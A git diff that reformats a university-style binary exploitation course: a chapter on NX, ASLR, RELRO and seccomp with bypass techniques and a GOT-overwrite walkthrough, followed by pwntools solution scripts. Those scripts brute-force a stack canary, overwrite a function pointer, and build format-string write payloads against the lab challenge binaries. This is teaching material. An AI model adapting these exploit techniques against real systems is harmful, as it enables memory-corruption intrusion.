`PROT_READ` for the first half (4096 bytes). +The later allocation is the data segment, that should be writable. +We can also see a bunch of allocations for segments belonging to dynamic libraries. -Note that the **stack** is not explicitly allocated by the loader. The kernel will keep increasing it each time a page fault is triggered without calling `mmap`. Also, the **heap** will be extended on-demand as the application requires it. +Note that the **stack** is not explicitly allocated by the loader. +The kernel will keep increasing it each time a page fault is triggered without calling `mmap`. 
+Also, the **heap** will be extended on-demand as the application requires it. We can dump all memory mappings of the running process as follows: -``` -$ ps u | grep /lib/ld-linux.so.2 +```console +$ ps u | grep /lib/ld-linux.so.2 ... # get the PID of the loader process from this output, let's assume it is 11198 + $ cat /proc/11198/maps ``` @@ -162,19 +207,19 @@ Make sure to use the PID of the loader process, and not the `strace` process. The output of the last `cat` command should be similar to: -``` +```text 08048000-08049000 r-xp 00000000 00:22 5769082 /home/sss-user/sss-binary/sessions/defense-mechanisms/activities/hello 08049000-0804a000 r--p 00000000 00:22 5769082 /home/sss-user/sss-binary/sessions/defense-mechanisms/activities/hello 0804a000-0804b000 rw-p 00001000 00:22 5769082 /home/sss-user/sss-binary/sessions/defense-mechanisms/activities/hello 56555000-56575000 r-xp 00000000 08:05 827365 /lib/i386-linux-gnu/ld-2.19.so 56575000-56576000 r--p 0001f000 08:05 827365 /lib/i386-linux-gnu/ld-2.19.so 56576000-56577000 rw-p 00020000 08:05 827365 /lib/i386-linux-gnu/ld-2.19.so -f7e23000-f7e24000 rw-p 00000000 00:00 0 +f7e23000-f7e24000 rw-p 00000000 00:00 0 f7e24000-f7fcd000 r-xp 00000000 08:05 823395 /lib/i386-linux-gnu/libc-2.19.so f7fcd000-f7fcf000 r--p 001a9000 08:05 823395 /lib/i386-linux-gnu/libc-2.19.so f7fcf000-f7fd0000 rw-p 001ab000 08:05 823395 /lib/i386-linux-gnu/libc-2.19.so -f7fd0000-f7fd3000 rw-p 00000000 00:00 0 -f7ffa000-f7ffd000 rw-p 00000000 00:00 0 +f7fd0000-f7fd3000 rw-p 00000000 00:00 0 +f7ffa000-f7ffd000 rw-p 00000000 00:00 0 f7ffd000-f7ffe000 r-xp 00000000 00:00 0 [vdso] fffdd000-ffffe000 rw-p 00000000 00:00 0 [stack] ``` @@ -183,35 +228,51 @@ fffdd000-ffffe000 rw-p 00000000 00:00 0 [stack] Below are a few methods of exploiting a binary that has **NX** enabled: -* **ret-to-plt/libc**. You can return to the `.plt` section and call library function already linked. You can also call other library functions based on their known offsets. 
The latter approach assumes no ASLR (see next section), or the possibility of an information leak. -* **mprotect()**. If the application is using `mprotect()` you can easily call it to modify the permissions and include `PROT_EXEC` for the stack. You can also call this in a `ret-to-libc` attack. You can also `mmap` a completely new memory region and dump the shellcode there. -* **Return Oriented Programming (ROP)**. This is a generalization of the `ret-to-*` approach that makes use of existing code to execute almost anything. As this is probably one of the most common types of attacks, it will be discussed in depth in a future section. +- **ret-to-plt/libc**: + You can return to the `.plt` section and call library function already linked. + You can also call other library functions based on their known offsets. + The latter approach assumes no ASLR (see next section), or the possibility of an information leak. +- **mprotect()**: + If the application is using `mprotect()` you can easily call it to modify the permissions and include `PROT_EXEC` for the stack. + You can also call this in a `ret-to-libc` attack. + You can also `mmap` a completely new memory region and dump the shellcode there. +- **Return Oriented Programming (ROP)**: + This is a generalization of the `ret-to-*` approach that makes use of existing code to execute almost anything. + As this is probably one of the most common types of attacks, it will be discussed in depth in a future section. ### Address Space Layout Randomization -**Address Space Layout Randomization (ASLR)** is a security feature that maps different memory regions of an executable at random addresses. This prevents buffer overflow-based attacks that rely on known addresses such as the stack (for calling into shellcode), or dynamically linked libraries (for calling functions that were not already linked with the target binary). 
Usually, the sections that are randomly mapped are: the stack, the heap, the VDSO page, and the dynamic libraries. The code section can also be randomly mapped for [PIE](https://en.wikipedia.org/wiki/Position-independent_code#PIE) binaries. +**Address Space Layout Randomization (ASLR)** is a security feature that maps different memory regions of an executable at random addresses. +This prevents buffer overflow-based attacks that rely on known addresses such as the stack (for calling into shellcode), or dynamically linked libraries (for calling functions that were not already linked with the target binary). +Usually, the sections that are randomly mapped are: the stack, the heap, the VDSO page, and the dynamic libraries. +The code section can also be randomly mapped for [PIE](https://en.wikipedia.org/wiki/Position-independent_code#PIE) binaries. -Linux allows 3 options for its ASLR implementation that can be configured using the `/proc/sys/kernel/randomize_va_space` file. Writing **0**, **1** or **2** to this will results in the following behaviors: +Linux allows 3 options for its ASLR implementation that can be configured using the `/proc/sys/kernel/randomize_va_space` file. +Writing **0**, **1** or **2** to this will result in the following behaviors: -* **0**: deactivated; -* **1**: random stack, vdso, libraries; heap is after code section; random code section (only for PIE-linked binaries); -* **2**: random heap too. +- **0**: deactivated; +- **1**: random stack, vdso, libraries; + heap is after code section; + random code section (only for PIE-linked binaries); +- **2**: random heap too. Make sure you reactivate ASLR after the previous section of the tutorial, by one of the two options below.
If you disabled ASLR system-wide, re-enable it using (root access is required): -``` -$ sudo bash -c 'echo 2 > /proc/sys/kernel/randomize_va_space' +```console +sudo bash -c 'echo 2 > /proc/sys/kernel/randomize_va_space' ``` If you disabled ASLR at shell level, simply **close the shell** such as issuing the `Ctrl+d` keyboard shortcut. We can easily demonstrate the effects of ASLR on shared libraries by running `ldd` multiple times in a row on a binary such as `/bin/ls`. -In GDB, ASLR is disabled by default in order to reduce the non-determinism and make debugging easier. However, when developing exploits we will sometimes want to test them in conjunction with ASLR. To enable ASLR in GDB, use the following command: +In GDB, ASLR is disabled by default in order to reduce the non-determinism and make debugging easier. +However, when developing exploits we will sometimes want to test them in conjunction with ASLR. +To enable ASLR in GDB, use the following command: -``` +```text pwndbg> set disable-randomization off ``` @@ -219,53 +280,79 @@ pwndbg> set disable-randomization off Below are a few methods of exploiting a binary that has **ASLR** enabled: -* **Bruteforce**. If you are able to inject payloads multiple times without crashing the application, you can bruteforce the address you are interested in (e.g., a target in libc). Otherwise, you can just run the exploit multiple times. Another thing to keep in mind is that, as addresses are randomized at load-time, child processes spawned with fork inherit the memory layout of the parent. Take the following scenario: we interact with a vulnerable sever that handles connections by forking to another process. We manage to obtain a leak from a child process but we are not able to create an exploit chain that leads to arbitrary code execution. However, we may still be able to use this leak in another connection, since the new process will have the same address space as the previous. -* **NOP sled**. 
In the case of shellcodes, a longer NOP sled will maximize the chances of jumping inside it and eventually reaching the exploit code even if the stack address is randomized. This is not very useful when we are interested in jumping to libc or other functions, which is usually the case if the executable space protection is also active. -* **jmp esp**. This will basically jump into the stack, no matter where it is mapped. It's actually a very rudimentary form of Return Oriented Programming which was discussed in the previous session. -* **Restrict entropy**. There are various ways of reducing the entropy of the randomized address. For example, you can decrease the initial stack size by setting a huge amount of dummy environment variables. -* **Partial overwrite**. This technique is useful when we are able to overwrite only the least significant byte(s) of an address (e.g. a GOT entry). We must take into account the offsets of the original and final addresses from the beginning of the mapping. If these offsets only differ in the last 8 bits, the exploit is deterministic, as the base of the mapping is aligned to 0x1000. The offsets of `read` and `write` in `libc6_2.27-3ubuntu1.2_i386` are suitable for a partial overwrite: - -``` -pwndbg> p read -$1 = {} 0xe6dd0 <__GI___libc_read> -pwndbg> p write -$2 = {} 0xe6ea0 <__GI___libc_write> -``` - -However, since bits 12-16 of the offsets differ, the corresponding bits in the full addresses would have to be bruteforced (probability 1/4). - -* **Information leak**. The most effective way of bypassing ASLR is by using an information leak vulnerability that exposes randomized address, or at least parts of them. You can also dump parts of libraries (e.g. `libc`) if you are able to create an exploit that reads them. This is useful in remote attacks to infer the version of the library, downloading it from the web, and thus knowing the right offsets for other functions (not originally linked with the binary). 
+- **Bruteforce**: + If you are able to inject payloads multiple times without crashing the application, you can bruteforce the address you are interested in (e.g., a target in libc). + Otherwise, you can just run the exploit multiple times. + Another thing to keep in mind is that, as addresses are randomized at load-time, child processes spawned with fork inherit the memory layout of the parent. + Take the following scenario: we interact with a vulnerable server that handles connections by forking to another process. + We manage to obtain a leak from a child process but we are not able to create an exploit chain that leads to arbitrary code execution. + However, we may still be able to use this leak in another connection, since the new process will have the same address space as the previous. + +- **NOP sled**: + In the case of shellcodes, a longer NOP sled will maximize the chances of jumping inside it and eventually reaching the exploit code even if the stack address is randomized. + This is not very useful when we are interested in jumping to libc or other functions, which is usually the case if the executable space protection is also active. + +- **jmp esp**: + This will basically jump into the stack, no matter where it is mapped. + It's actually a very rudimentary form of Return Oriented Programming which was discussed in the previous session. + +- **Restrict entropy**: + There are various ways of reducing the entropy of the randomized address. + For example, you can decrease the initial stack size by setting a huge amount of dummy environment variables. + +- **Partial overwrite**: + This technique is useful when we are able to overwrite only the least significant byte(s) of an address (e.g. a GOT entry). + We must take into account the offsets of the original and final addresses from the beginning of the mapping. + If these offsets only differ in the last 8 bits, the exploit is deterministic, as the base of the mapping is aligned to 0x1000.
+ The offsets of `read` and `write` in `libc6_2.27-3ubuntu1.2_i386` are suitable for a partial overwrite: + + ```console + pwndbg> p read + $1 = {} 0xe6dd0 <__GI___libc_read> + pwndbg> p write + $2 = {} 0xe6ea0 <__GI___libc_write> + ``` + + However, since bits 12-16 of the offsets differ, the corresponding bits in the full addresses would have to be bruteforced (probability 1/4). + +- **Information leak**: + The most effective way of bypassing ASLR is by using an information leak vulnerability that exposes randomized address, or at least parts of them. + You can also dump parts of libraries (e.g. `libc`) if you are able to create an exploit that reads them. + This is useful in remote attacks to infer the version of the library, downloading it from the web, and thus knowing the right offsets for other functions (not originally linked with the binary). ### Chaining Information Leaks with GOT Overwrite In this tutorial we will exploit a program that is similar to the `no-ret-control` challenge from a previous session: -``` +```c #include #include - + int main() { int *addr; - + printf("Here's a libc address: 0x%08x\n", printf); - + printf("Give me and address to modify!\n"); scanf("%p", &addr); - + printf("Give me a value!\n"); scanf("%u", addr); - + sleep(10); - + printf("Abandon all hope ye who reach this...\n"); } ``` -The goal is to alter the execution flow and avoid reaching the final `printf`. To this end, we will overwrite the `sleep` entry in GOT and redirect it to `exit`. However, due to ASLR, the value can not be hardcoded and must be computed at runtime. +The goal is to alter the execution flow and avoid reaching the final `printf`. +To this end, we will overwrite the `sleep` entry in GOT and redirect it to `exit`. +However, due to ASLR, the value can not be hardcoded and must be computed at runtime. 
-Whenever we operate with addresses belonging to shared libraries, we must be aware that the offsets are highly dependent on the particular build of the library. We can identify this build either by its BuildID (retrieved with the file command), or by its version string: +Whenever we operate with addresses belonging to shared libraries, we must be aware that the offsets are highly dependent on the particular build of the library. +We can identify this build either by its BuildID (retrieved with the file command), or by its version string: -``` +```console silvia@imladris:/sss/demo$ ldd ./got_overwrite linux-gate.so.1 (0xf7ee8000) libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xf7ccc000) @@ -278,18 +365,18 @@ GNU C Library (Ubuntu GLIBC 2.27-3ubuntu1.2) stable release version 2.27. Alternatively, if we don't have prior knowledge of the remote system where the binary runs, but obtain via an information leak some addresses, we may be able to identify the libc based on the last 3 nibbles (a nibble is a group of 4 bits) of these addresses: -``` +```text 0xf7df6250 <__libc_system> 0xf7e780e0 <__sleep> ``` The least significant 3 nibbles of the above addresses are `250` and `0e0`, respectively. -We enter them in the [libc database](https://libc.blukat.me/) and get a match for the same `libc` build we determined earlier. +We enter them in the [libc database](https://libc.blukat.me/) and get a match for the same `libc` build we determined earlier. 
For this `libc`, we obtain the offsets of the functions we are interested in using GDB: -``` +```console silvia@imladris:/sss/demo$ gdb -q -n /lib/i386-linux-gnu/libc.so.6 (gdb) p printf $1 = {} 0x513a0 <__printf> @@ -299,7 +386,7 @@ $2 = {} 0x30420 <__GI_exit> We will also need the address of `sleep@got` (which is static because the binary is not position independent): -``` +```console silvia@imladris:/sss/demo$ objdump -d -M intel -j .plt ./got_overwrite | grep "sleep@plt" -A1 080483b0 : 80483b0: ff 25 0c a0 04 08 jmp DWORD PTR ds:0x804a00c @@ -307,14 +394,14 @@ silvia@imladris:/sss/demo$ objdump -d -M intel -j .plt ./got_overwrite | grep "s We start the program and compute the address of exit based on the leak of printf (in another terminal): -``` +```text >>> printf_offset = 0x513a0 >>> exit_offset = 0x30420 >>> 0xf7dfb3a0 - printf_offset + exit_offset 4158497824 ``` -``` +```console silvia@imladris:/sss/demo$ ./got_overwrite Here's a libc address: 0xf7dfb3a0 Give me and address to modify! @@ -326,30 +413,29 @@ silvia@imladris:/sss/demo$ echo $? ``` As we intended, the `GOT` entry corresponding to `sleep` was overwritten by exit and the program exited with code 10 without printing the final message. - The following pwntools script automates this interaction: -``` +```python from pwn import * - + p = process('./got_overwrite') libc = ELF('/lib/i386-linux-gnu/libc.so.6') - + sleep_got = p.elf.got['sleep'] - + p.recvuntil('libc address:') libc_leak = int(p.recvuntil('\n')[:-1], 16) libc_base = libc_leak - libc.symbols['printf'] - + print("Libc base is at: 0x%x" % libc_base) - + exit = libc_base + libc.symbols['exit'] - + p.sendline(hex(sleep_got)) - + p.recvuntil('value!') p.sendline(str(exit)) - + p.interactive() ``` @@ -359,25 +445,36 @@ p.interactive() It comes in two flavors: -* **Partial**. Protects the `.init_array`, `.fini_array`, `.dynamic` and `.got` sections (but NOT `.got.plt`); -* **Full**. 
Additionally protects `.got.plt`, rendering the **GOT overwrite** attack infeasible. +- **Partial**: + Protects the `.init_array`, `.fini_array`, `.dynamic` and `.got` sections (but NOT `.got.plt`). +- **Full**: + Additionally protects `.got.plt`, rendering the **GOT overwrite** attack infeasible. -In a previous session we explained how the addresses of dynamically linked functions are resolved using lazy binding. When Full RELRO is in effect, the addresses are resolved at load-time and then marked as read-only. Due to the way address space protection works, this means that the `.got` resides in the read-only mapping, instead of the read-write mapping that contains the `.bss`. +In a previous session we explained how the addresses of dynamically linked functions are resolved using lazy binding. +When Full RELRO is in effect, the addresses are resolved at load-time and then marked as read-only. +Due to the way address space protection works, this means that the `.got` resides in the read-only mapping, instead of the read-write mapping that contains the `.bss`. -This is not a game-over in terms of exploitation, as other overwriteable code pointers often exist. These can be specific to the application we want to exploit or reside in shared libraries (for example: the GOT of shared libraries that are not compiled with RELRO). The return addresses on the stack are still viable targets. +This is not a game-over in terms of exploitation, as other overwriteable code pointers often exist. +These can be specific to the application we want to exploit or reside in shared libraries (for example: the GOT of shared libraries that are not compiled with RELRO). +The return addresses on the stack are still viable targets. ### seccomp -**Seccomp** is a mechanism though which an application may transition into a state where the system calls it performs are restricted. 
The policy, which may act on a whitelist or blacklist model, is described using [eBPF](https://lwn.net/Articles/593476/). +**Seccomp** is a mechanism through which an application may transition into a state where the system calls it performs are restricted. +The policy, which may act on a whitelist or blacklist model, is described using [eBPF](https://lwn.net/Articles/593476/). -**Seccomp** filters are instated using the `prctl` syscall (`PR_SET_SECCOMP`). Once it is in effect, the application will be effectively sandboxed and the restrictions will be inherited by child processes. +**Seccomp** filters are instated using the `prctl` syscall (`PR_SET_SECCOMP`). +Once it is in effect, the application will be effectively sandboxed and the restrictions will be inherited by child processes. -This may severely limit our exploitation prospects in some cases. In the challenges that we have solved during these sessions, a common goal was spawning a shell and retrieving a certain file (the flag). If the exploited binary used a seccomp filter that disallowed the `execve` syscall (used by the `system` library function), this would have thwarted our exploit. +This may severely limit our exploitation prospects in some cases. +In the challenges that we have solved during these sessions, a common goal was spawning a shell and retrieving a certain file (the flag). +If the exploited binary used a seccomp filter that disallowed the `execve` syscall (used by the `system` library function), this would have thwarted our exploit. -The [seccomp-tools](https://github.com/david942j/seccomp-tools) suite provides tools for analyzing seccomp filters. The `dump` subcommand may be used to extract the filter from a binary at runtime and display it in a pseudocode format: +The [seccomp-tools](https://github.com/david942j/seccomp-tools) suite provides tools for analyzing seccomp filters.
+The `dump` subcommand may be used to extract the filter from a binary at runtime and display it in a pseudocode format: -``` -silvia@imladris:/sss/demo$ seccomp-tools dump ./seccomp_example +```console +$ seccomp-tools dump ./seccomp_example line CODE JT JF K ================================= 0000: 0x20 0x00 0x00 0x00000004 A = arch @@ -398,39 +495,45 @@ In the example above we see a filter operating on the whitelist model: it specif To install `seccomp-tools` on the Kali VM, use the the `gem` package manager: -``` -$ gem install seccomp-tools +```console +gem install seccomp-tools ``` ## Challenges -Challenges can be found in the `activities/` directory. +Challenges can be found in the `drills/` directory. ### 01-04. Challenges - rwslotmachine[1-4] -All of the challenges in this section are intended to be solved with **ASLR enabled**. However, you are free to disable it while developing your exploit for debugging purposes. You are provided with the needed shared libraries from the remote system. +All of the challenges in this section are intended to be solved with **ASLR enabled**. +However, you are free to disable it while developing your exploit for debugging purposes. +You are provided with the needed shared libraries from the remote system. -The challenges are based on the same "application": the binaries expose very similar functionality with minimal implementation differences. Your job is to identify the defense mechanisms in use for each of them and bypass them in order to read a flag from the remote system. +The challenges are based on the same "application": the binaries expose very similar functionality with minimal implementation differences. +Your job is to identify the defense mechanisms in use for each of them and bypass them in order to read a flag from the remote system. They are numbered in the suggested solving order. **Tips**: -* Do not waste time on reverse engineering `rwslotmachine3`! 
It is very similar to `rwslotmachine2`, but operates on the client/server model. -* To set `LD_LIBRARY_PATH` from within a pwntools script, use `p = process('./rwslotmachineX', env={'LD_LIBRARY_PATH' : '.'})`. -* In the case of `rwslotmachine4`, you will need the shared library `libint.so` (found inside of the github repo). +- Do not waste time on reverse engineering `rwslotmachine3`! + It is very similar to `rwslotmachine2`, but operates on the client/server model. +- To set `LD_LIBRARY_PATH` from within a pwntools script, use `p = process('./rwslotmachineX', env={'LD_LIBRARY_PATH' : '.'})`. +- In the case of `rwslotmachine4`, you will need the shared library `libint.so` (found inside of the github repo). ### 05. Bonus - rwslotmachine5 -This challenge is similar to `rwslotmachine1`. However, your exploit for the first challenge will (most likely) not work. Investigate why and develop a bypass. +This challenge is similar to `rwslotmachine1`. +However, your exploit for the first challenge will (most likely) not work. +Investigate why and develop a bypass. -**Hint**: You can find a table describing x86 syscalls [here](https://chromium.googlesource.com/chromiumos/docs/+/master/constants/syscalls.md#x86-32_bit). +**Hint**: You can find a table describing x86 syscalls [here](https://chromium.googlesource.com/chromiumos/docs/+/master/constants/syscalls.md#x86-32_bit). ## Further Reading -* [PaX PAGEEXEC](https://en.wikipedia.org/wiki/PaX#PAGEEXEC) -* [PaX SEGMEXEC](https://en.wikipedia.org/wiki/PaX#SEGMEXEC) -* [Black Hat & DEF CON 2010, JIT spraying slides](http://www.semantiscope.com/research/BHDC2010/BHDC-2010-Slides-v2.pdf); -* [Interpreter Exploitation. Pointer Inference and JIT Spraying](http://www.semantiscope.com/research/BHDC2010/BHDC-2010-Paper.pdf). 
-* [DEP](https://docs.microsoft.com/en-us/windows/win32/memory/data-execution-prevention) -* [eBPF](https://lwn.net/Articles/593476/) +- [PaX PAGEEXEC](https://en.wikipedia.org/wiki/PaX#PAGEEXEC) +- [PaX SEGMEXEC](https://en.wikipedia.org/wiki/PaX#SEGMEXEC) +- [Black Hat & DEF CON 2010, JIT spraying slides](http://www.semantiscope.com/research/BHDC2010/BHDC-2010-Slides-v2.pdf); +- [Interpreter Exploitation. Pointer Inference and JIT Spraying](http://www.semantiscope.com/research/BHDC2010/BHDC-2010-Paper.pdf). +- [DEP](https://docs.microsoft.com/en-us/windows/win32/memory/data-execution-prevention) +- [eBPF](https://lwn.net/Articles/593476/) diff --git a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/01-challenge-mycanary/sol/exploit.py b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/01-challenge-mycanary/sol/exploit.py index f124da0..6aaf8fc 100755 --- a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/01-challenge-mycanary/sol/exploit.py +++ b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/01-challenge-mycanary/sol/exploit.py @@ -2,30 +2,36 @@ from pwn import * e = ELF("../src/mycanary", checksec=False) -bad_func = e.symbols['bad_func'] +bad_func = e.symbols["bad_func"] - -payload = b"A" * 100 + b"\xef\xbe\x01\xde" + p32(bad_func) + p32(bad_func) + p32(bad_func) + p32(bad_func) +payload = ( + b"A" * 100 + + b"\xef\xbe\x01\xde" + + p32(bad_func) + + p32(bad_func) + + p32(bad_func) + + p32(bad_func) +) c = 0 # brute force loop while True: - print(p32(bad_func)) - # open program - p = remote("127.0.0.1",4545) - #print(p.recvline()) - p.sendline(payload) - # recieve trash text and discard - line = p.recv() - - print(line) - p.close() + print(p32(bad_func)) + # open program + p = remote("127.0.0.1", 4545) + # print(p.recvline()) + p.sendline(payload) + # receive trash text and discard + line = p.recv() + + print(line) + p.close() - if b"Missile launched!" 
in line: - # SUCCESS!!$$$ - print(line) - print("Success after %d attempts" % c) - break - else: - c += 1 + if b"Missile launched!" in line: + # SUCCESS!!$$$ + print(line) + print("Success after %d attempts" % c) + break + else: + c += 1 diff --git a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/01-challenge-mycanary/sol/exploit_local.py b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/01-challenge-mycanary/sol/exploit_local.py index 88a0737..0abb033 100755 --- a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/01-challenge-mycanary/sol/exploit_local.py +++ b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/01-challenge-mycanary/sol/exploit_local.py @@ -2,35 +2,43 @@ from pwn import * e = ELF("../src/mycanary", checksec=False) -bad_func = e.symbols['bad_func'] +bad_func = e.symbols["bad_func"] -payload = b"A" * 100 + b"\xef\xbe\x01\xde" + p32(bad_func) + p32(bad_func)+ p32(bad_func)+ p32(bad_func)+ p32(bad_func) +payload = ( + b"A" * 100 + + b"\xef\xbe\x01\xde" + + p32(bad_func) + + p32(bad_func) + + p32(bad_func) + + p32(bad_func) + + p32(bad_func) +) c = 0 # brute force loop while True: - # open program - p = process('../src/mycanary') - #p=gdb.debug( './mycanary','''set follow-fork-mode child - # break *0x080499b6 - # continue - # ''') - p.sendline(payload) - # recieve trash text and discard - line = p.recvline() - print(line) - if b'Canary' not in line: - p.kill() - - else: - line = p.recv() - print(line) - break - if "Missile launched!" 
in line.decode(): - # SUCCESS!!$$$ - print(line) - print("Success after %d attempts" % c) - break - else: - c += 1 + # open program + p = process("../src/mycanary") + # p=gdb.debug( './mycanary','''set follow-fork-mode child + # break *0x080499b6 + # continue + # ''') + p.sendline(payload) + # receive trash text and discard + line = p.recvline() + print(line) + if b"Canary" not in line: + p.kill() + + else: + line = p.recv() + print(line) + break + if "Missile launched!" in line.decode(): + # SUCCESS!!$$$ + print(line) + print("Success after %d attempts" % c) + break + else: + c += 1 diff --git a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/02-challenge-bulletproof/sol/exploit.py b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/02-challenge-bulletproof/sol/exploit.py index 1d3e8d2..4c96135 100755 --- a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/02-challenge-bulletproof/sol/exploit.py +++ b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/02-challenge-bulletproof/sol/exploit.py @@ -1,26 +1,28 @@ #!/usr/bin/python from pwn import * + # Helper function to extract one byte from an integer # ex. extract_byte(0xaabbccdd, 0) => 0xdd # ex. 
extract_byte(0xaabbccdd, 2) => 0xbb def extract_byte(value, pos): - return (value >> (pos * 8)) % 256 + return (value >> (pos * 8)) % 256 + e = ELF("./bulletproof", checksec=False) -bad_func = e.symbols['bad_func'] -exit_handler = e.symbols['exit_handler'] -admin_name = e.symbols['admin'] + 4 +bad_func = e.symbols["bad_func"] +exit_handler = e.symbols["exit_handler"] +admin_name = e.symbols["admin"] + 4 p = process("./bulletproof") # Overwrite function pointer -p.send('2') +p.send("2") p.sendline("%d %s" % (exit_handler - admin_name, chr(extract_byte(bad_func, 0)))) p.sendline("%d %s" % (exit_handler - admin_name + 1, chr(extract_byte(bad_func, 1)))) p.sendline("%d %s" % (exit_handler - admin_name + 2, chr(extract_byte(bad_func, 2)))) p.sendline("%d %s" % (exit_handler - admin_name + 3, chr(extract_byte(bad_func, 3)))) -p.send('3') +p.send("3") print(p.recv()) p.close() diff --git a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format1/sol/exploit_format1.py b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format1/sol/exploit_format1.py index c0b16cc..2c6cdd2 100755 --- a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format1/sol/exploit_format1.py +++ b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format1/sol/exploit_format1.py @@ -7,23 +7,30 @@ # the stack head varies between runs. 
We use helper_format1.py # to determine where it might reside -e = ELF('./format1', checksec=False) - -target_offset = e.symbols['target'] +e = ELF("./format1", checksec=False) + +target_offset = e.symbols["target"] # This number is found using helper_format1.py position = 256 for i in range(1000): - payload = "AAAABBBB" + p32(target_offset) + "DDDD %" + str(position) + "$n%" + str(position+1) + "$x" + payload = ( + "AAAABBBB" + + p32(target_offset) + + "DDDD %" + + str(position) + + "$n%" + + str(position + 1) + + "$x" + ) - p = process(["./format1", payload]) + p = process(["./format1", payload]) - try: - print("%s"% (p.read())) - break - except EOFError: - pass - + try: + print("%s" % (p.read())) + break + except EOFError: + pass - p.close() + p.close() diff --git a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format1/sol/exploit_format3.py b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format1/sol/exploit_format3.py index 37682da..99e3391 100755 --- a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format1/sol/exploit_format3.py +++ b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format1/sol/exploit_format3.py @@ -2,11 +2,16 @@ from pwn import * import sys -e = ELF('./format3', checksec=False) - -target_addr = int(e.symbols['target']) +e = ELF("./format3", checksec=False) -payload = p32(target_addr) + p32(target_addr + 1) + p32(target_addr + 2) + p32(target_addr + 3) +target_addr = int(e.symbols["target"]) + +payload = ( + p32(target_addr) + + p32(target_addr + 1) + + p32(target_addr + 2) + + p32(target_addr + 3) +) payload += "%52x" + "%12$n" + "%17x" + "%13$n" + "%173x" + "%14$n" print(payload) diff --git 
a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format1/sol/exploit_format4.py b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format1/sol/exploit_format4.py index 0e12a4d..757cf87 100755 --- a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format1/sol/exploit_format4.py +++ b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format1/sol/exploit_format4.py @@ -6,50 +6,58 @@ # could be shorter. The reason it is so long is because it takes into # account the fact that the address for the 'hello' function could change + # Helper function to extract one byte from an integer # ex. extract_byte(0xaabbccdd, 0) => 0xdd # ex. extract_byte(0xaabbccdd, 2) => 0xbb def extract_byte(value, pos): - return (value >> (pos * 8)) % 256 + return (value >> (pos * 8)) % 256 + def get_byte_padding(current, wanted): - # Fuction is supposed to only give paddings for one byte - wanted %= 256 - current %= 256 - - # Printing a hex value with less than 8 padding can - # print variable number of digits. We need to be sure - # how many digits we print - if wanted - 8 >= current: - return wanted - current - else: - return wanted + 256 - current - -e = ELF('./format4', checksec=False) - -target_addr = int(e.symbols['got.exit']) -hello_addr = int(e.symbols['hello']) + # Function is supposed to only give paddings for one byte + wanted %= 256 + current %= 256 + + # Printing a hex value with less than 8 padding can + # print variable number of digits.
We need to be sure + # how many digits we print + if wanted - 8 >= current: + return wanted - current + else: + return wanted + 256 - current + + +e = ELF("./format4", checksec=False) + +target_addr = int(e.symbols["got.exit"]) +hello_addr = int(e.symbols["hello"]) # Position on the stack where the arguments will be pos = 4 -payload = p32(target_addr) + p32(target_addr + 1) + p32(target_addr + 2) + p32(target_addr + 3) +payload = ( + p32(target_addr) + + p32(target_addr + 1) + + p32(target_addr + 2) + + p32(target_addr + 3) +) bytes_printed = len(payload) + 1 next_padding = get_byte_padding(bytes_printed, extract_byte(hello_addr, 0)) bytes_printed += next_padding + 1 -payload += "%" + str(next_padding) + "x %" + str(pos)+ "$n" +payload += "%" + str(next_padding) + "x %" + str(pos) + "$n" next_padding = get_byte_padding(bytes_printed, extract_byte(hello_addr, 1)) bytes_printed += next_padding + 1 -payload += "%" + str(next_padding) + "x %" + str(pos + 1)+ "$n" +payload += "%" + str(next_padding) + "x %" + str(pos + 1) + "$n" next_padding = get_byte_padding(bytes_printed, extract_byte(hello_addr, 2)) bytes_printed += next_padding + 1 -payload += "%" + str(next_padding) + "x %" + str(pos + 2)+ "$n" +payload += "%" + str(next_padding) + "x %" + str(pos + 2) + "$n" next_padding = get_byte_padding(bytes_printed, extract_byte(hello_addr, 3)) -payload += "%" + str(next_padding) + "x %" + str(pos + 3)+ "$n" +payload += "%" + str(next_padding) + "x %" + str(pos + 3) + "$n" print(payload) @@ -58,4 +66,3 @@ def get_byte_padding(current, wanted): # p.sendline(payload) # print(p.read()) # p.close() - diff --git a/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format1/sol/helper_format1.py b/chapters/mitigations-and-defensive-strategies/information-leaks/activities/03-challenge-format-strings/format1/sol/helper_format1.py index 5804e05..2191924 100755 --- 
